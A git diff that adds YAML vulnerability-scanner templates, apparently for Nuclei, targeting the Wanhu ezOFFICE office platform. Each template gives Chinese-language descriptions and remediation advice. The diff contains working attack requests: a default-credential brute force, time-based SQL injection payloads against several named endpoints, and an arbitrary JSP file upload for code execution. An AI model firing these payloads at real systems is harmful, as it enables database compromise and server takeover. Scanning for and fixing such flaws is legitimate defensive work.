"a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-default-login.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-default-login.yaml" new file mode 100755 index 000000000..b765b194f --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-default-login.yaml" @@ -0,0 +1,42 @@ +id: wanhuOA-default-login +info: + name: 万户OA eWebEditor编辑后台默认弱口令漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE eWebEditor编辑后台默认弱口令漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE eWebEditor编辑后台存在弱口令漏洞。 + severity: high + remediation: |- + 修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'window.self.focus') + path: + - '{{BaseURL}}/defaultroot/public/edit/admin/login.jsp?action=login' + attack: clusterbomb + method: POST + body: usr={{user}}&pwd={{pass}} + payloads: + pass: + - admin + - ezoffice + - qwertyuiop123 + user: + - admin + - ezoffice + headers: + Host: '{{Hostname}}' + req-condition: true + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-DossierBorrowAction.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-DossierBorrowAction.yaml" new file mode 100755 index 000000000..a13e6ff55 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-DossierBorrowAction.yaml" @@ -0,0 +1,38 @@ +id: wanhuOA-sqli-DossierBorrowAction +info: + name: 万户OA DossierBorrowAction 注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE DossierBorrowAction.do SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/defaultroot/DossierBorrowAction.do?action=load&record=1' + - '{{BaseURL}}/defaultroot/DossierBorrowAction.do?action=load&record=1;WAITFOR DELAY+"0:0:5"--+-' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovDocumentDossierAction.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovDocumentDossierAction.yaml" new file mode 100755 index 000000000..86473b55f --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovDocumentDossierAction.yaml" @@ -0,0 +1,38 @@ +id: wanhuOA-sqli-GovDocumentDossierAction +info: + name: 万户OA GovDocumentDossierAction 注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE GovDocumentDossierAction.do SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/defaultroot/GovDocumentDossierAction.do?flag=sendFile&id=1' + - '{{BaseURL}}/defaultroot/GovDocumentDossierAction.do?flag=sendFile&id=1;WAITFOR+DELAY+''0:0:5''--+-' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovSendFileAction.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovSendFileAction.yaml" new file mode 100755 index 000000000..62f160738 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovSendFileAction.yaml" @@ -0,0 +1,38 @@ +id: wanhuOA-sqli-GovSendFileAction +info: + name: 万户OA GovSendFileAction 注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE GovSendFileAction.do SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/defaultroot/GovSendFileAction.do?action=listLoad&editId=2' + - '{{BaseURL}}/defaultroot/GovSendFileAction.do?action=listLoad&editId=2%20AND%209847%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2871%29%7C%7CCHR%28114%29%7C%7CCHR%28114%29%7C%7CCHR%2871%29%2C5%29' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-NameCardAction.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-NameCardAction.yaml" new file mode 100755 index 000000000..de2a8d336 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-NameCardAction.yaml" @@ -0,0 +1,38 @@ +id: wanhuOA-sqli-NameCardAction +info: + name: 万户OA NameCardAction 注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE NameCardAction.do SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/defaultroot/NameCardAction.do?action=delperson&delId=1' + - '{{BaseURL}}/defaultroot/NameCardAction.do?action=delperson&delId=1%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-WorkflowCommonAction.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-WorkflowCommonAction.yaml" new file mode 100755 index 000000000..89c3a09e1 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-WorkflowCommonAction.yaml" @@ -0,0 +1,41 @@ +id: wanhuOA-sqli-WorkflowCommonAction +info: + name: 万户OA WorkflowCommonAction 注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE WorkflowCommonAction.do SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + raw: + - | + GET /defaultroot/WorkflowCommonAction.do?flag=back&curActivityId=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + GET /defaultroot/WorkflowCommonAction.do?flag=back&curActivityId=1%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-desktop.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-desktop.yaml" new file mode 100755 index 000000000..86e57d5a3 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-desktop.yaml" @@ -0,0 +1,45 @@ +id: wanhuOA-sqli-desktop +info: + name: 万户OA desktop.jsp SQL注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE desktop.jsp SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + raw: + - | + POST /defaultroot/mobile/desktop.jsp?isLogin=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userPassword=admin&submit=++++%E7%99%BB%E5%BD%95++++&userName=admin + - | + POST /defaultroot/mobile/desktop.jsp?isLogin=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userPassword=admin&submit=++++%E7%99%BB%E5%BD%95++++&userName=adminNlcS%27%20AND%209053%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%7C%7CCHR%28104%29%2C5%29%20AND%20%27TTGN%27%3D%27TTGN + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-outMailLoginCheck.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-outMailLoginCheck.yaml" new file mode 100755 index 000000000..eb775ff40 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-outMailLoginCheck.yaml" @@ -0,0 +1,38 @@ +id: wanhuOA-sqli-outMailLoginCheck +info: + name: 万户OA outMailLoginCheck 注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE outMailLoginCheck.jsp SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + path: + - '{{BaseURL}}/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=1' + - '{{BaseURL}}/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=''%20OR%205754%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(79)%7C%7CCHR(66)%7C%7CCHR(100)%7C%7CCHR(90)%2C5)%20AND%20''a''%3D''a' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-savePersonInfo.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-savePersonInfo.yaml" new file mode 100755 index 000000000..3f76d8b99 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-savePersonInfo.yaml" @@ -0,0 +1,45 @@ +id: wanhuOA-sqli-savePersonInfo +info: + name: 万户OA savePersonInfo 注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE savePersonInfo.jsp SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - (duration_2 - duration_1) >= 5 + raw: + - | + POST /defaultroot/mobile/setting/savePersonInfo.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + setpers_EmpEnglishName=setpers_UserAccounts=TpDv&setpers_UserSimpleName=&setpers_EmpMobilePhone=TpIy&setpers_EmpbusPhone=&setpers_EmpEmail=JxIC&setpers_EmpPhone=&setpers_Empsex1=0&setpers_EmpDescribe=ffASsetpers_EmpName=exci + - | + POST /defaultroot/mobile/setting/savePersonInfo.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + setpers_EmpEnglishName=setpers_UserAccounts=TpDv&setpers_UserSimpleName=&setpers_EmpMobilePhone=TpIy&setpers_EmpbusPhone=&setpers_EmpEmail=JxIC&setpers_EmpPhone=&setpers_Empsex1=0&setpers_EmpDescribe=ffASsetpers_EmpName=exci'%3BWAITFOR%20DELAY%20'0%3A0%3A5'-- + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903.yaml" new file mode 100755 index 000000000..8beb3555d --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903.yaml" @@ -0,0 +1,72 @@ +id: wooyun-2014-063903 +info: + name: 万户ezOffice协同办公管理平台 livephotoupload.jsp 文件上传漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE livephotoupload.jsp 任意文件上传漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body_1,varName) + - contains(body_2,verify) + extractors: + - name: tmpFIle + type: regex + regex: + - goodsPicName\.value = "(.+?)"; + group: 1 + part: body + internal: true + raw: + - | + POST /defaultroot/public/jsp/livephotoupload.jsp?path=goodspic&mode=add&hiddenName=goodsPicName&visualName=goodsPicName HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=ffb3cc4faa19bf85108f166d3069705f + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="file1"; filename="{{varName}}.jsp" + Content-Type: Content-Type: application/octet-stream + + <% + out.println(new String("{{verify}}"))); + new java.io.File(application.getRealPath(request.getServletPath())).delete(); + %> + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="submit" + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="continueUpload" + + 1 + --ffb3cc4faa19bf85108f166d3069705f-- + - | + GET /defaultroot/upload/information/{{tmpFIle}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + varName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903_2.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903_2.yaml" new file mode 100755 index 000000000..ac02cae4b --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903_2.yaml" @@ -0,0 +1,72 @@ +id: wooyun-2014-063903_2 +info: + name: 万户ezOffice协同办公管理平台 livephotoupload2.jsp 文件上传漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE livephotoupload2.jsp 任意文件上传漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body_1,varName) + - contains(body_2,verify) + extractors: + - name: tmpFIle + type: regex + regex: + - goodsPicName\.value = "(.+?)"; + group: 1 + part: body + internal: true + raw: + - | + POST /defaultroot/public/jsp/livephotoupload2.jsp?path=peopleinfo&mode=add&hiddenName=empLivingPhoto&visualName=empLivingPhotoTemp HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=ffb3cc4faa19bf85108f166d3069705f + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="file1"; filename="{{varName}}.jsp" + Content-Type: Content-Type: 